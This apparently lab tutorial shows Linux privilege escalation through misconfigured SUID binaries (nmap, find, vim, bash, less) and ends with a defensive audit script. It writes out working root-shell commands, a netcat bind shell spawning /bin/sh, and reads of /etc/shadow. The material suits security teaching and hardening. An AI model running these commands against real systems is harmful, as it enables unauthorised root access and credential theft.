In the Kali lab, attacking M2, we had an attack path through distcc v1 and obtained a shell (1), then upgraded that shell to a TTY shell (2).
Now it is time to find a way to escalate. Refer to the articles on escalation via SUID executables here:
Linux Privilege Escalation using SUID Binaries
or the following guide …
SUID (Set User ID) is a type of permission which is given to a file and allows users to execute the file with the permissions of its owner. There are plenty of reasons why a Linux binary can have this type of permission set. For example the ping utility requires root privileges in order to open a raw network socket, but it needs to be executable by standard users as well so they can verify connectivity with other hosts.
However some of the existing binaries and utilities can be used to escalate privileges to root if they have the SUID permission. Known Linux executables that can allow privilege escalation are:
- Nmap
- Vim
- find
- Bash
- More
- Less
- Nano
- cp
The following commands can discover all the SUID executables present on the system. More specifically the commands will try to find files under the / directory owned by the user root that have the SUID permission bit set, print them, and redirect all errors to /dev/null in order to list only the binaries that the user has permission to access.
```
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
```

All of the binaries above will be executed with root privileges since they contain the “s” in their permissions and they are owned by the root user.
```
ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
```

Nmap
Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is in the list of binaries that are executed with root privileges, it is possible to use the interactive console in order to run a shell with the same privileges.
```
nmap -V
```

The interactive mode is started by executing Nmap with the “--interactive” parameter.
```
nmap --interactive
```

The following command will give an elevated shell.
```
nmap> !sh
sh-3.2# whoami
root
```

Alternatively there is a Metasploit module which performs privilege escalation via SUID Nmap binaries.
```
exploit/unix/local/setuid_nmap
```
Find
The utility find can be used to discover files stored on the system. However, it also has the ability to execute commands. Therefore, if it is configured to run with the SUID permission, all the commands executed through find will run as root.
```
touch pentestlab
find pentestlab -exec whoami \;
```

Since the majority of Linux operating systems have netcat installed, it is possible to upgrade the elevated command execution into a root shell.
```
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
```

Connecting to the opened port will give a root shell.
```
netcat 192.168.1.189 5555
id
cat /etc/shadow
```

Vim
The main use of Vim is to be a text editor. However, if it runs as SUID it will inherit the permissions of the root user and therefore it can read any file on the system.
```
vim.tiny /etc/shadow
```

Further root activities can be done by running a shell through Vim.
```
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
```

Bash
The following command will open a bash shell as root.
```
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
```

Less
The utility Less can also execute an elevated shell. The same principle applies to the More command.
```
less /etc/passwd
!/bin/sh
```

Conclusion
Performing privilege escalation through misconfigured SUID executables is trivial. Therefore administrators should evaluate all the SUID binaries and whether they really need to run with the permissions of an elevated user. Particular focus should be given to applications with the ability to execute code or write arbitrary data on the system.
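To carry out the evaluation the conclusion recommends, the following script (an added example, not part of the original article) enumerates root-owned SUID files with the article's own find command and flags any whose name matches the list of executables given above; the RISKY_SUID list and the sample inventory are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original article): audit the SUID binaries on a
# host and flag those whose names appear on the article's list of executables
# known to allow privilege escalation when SUID.

# Basenames the article lists (nmap, vim, find, bash, more, less, nano, cp);
# vim.tiny is included because the article's Vim example uses it.
RISKY_SUID="nmap vim vim.tiny find bash more less nano cp"

# Read absolute paths, one per line, on stdin; print those whose basename is in
# RISKY_SUID. Plain POSIX sh so it also runs on a minimal box.
flag_risky_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        for risky in $RISKY_SUID; do
            if [ "$name" = "$risky" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Enumerate root-owned SUID files on the live system (the article's first find
# command, restricted to regular files) and pass them through the filter.
# Errors for unreadable directories are discarded, exactly as in the article.
audit_suid() {
    find / -user root -perm -4000 -type f -print 2>/dev/null | flag_risky_suid
}

# Constructed sample inventory standing in for find's output on a misconfigured
# host; /usr/bin/passwd and /usr/bin/sudo are legitimately SUID and must not be
# flagged.
SAMPLE_SUID_LIST='/usr/bin/passwd
/usr/bin/nmap
/usr/bin/sudo
/usr/bin/find
/bin/vim.tiny'

# Number of risky entries in the sample (expected: 3).
count_risky_in_sample() {
    printf '%s\n' "$SAMPLE_SUID_LIST" | flag_risky_suid | wc -l | tr -d ' '
}

# Each flagged path is a candidate for "chmod u-s <path>" once it is confirmed
# that nothing on the host depends on the binary being SUID.
printf '%s\n' "$SAMPLE_SUID_LIST" | flag_risky_suid
```

Run `audit_suid` instead of the sample to check a real host; the output is the list of SUID binaries that deserve a second look.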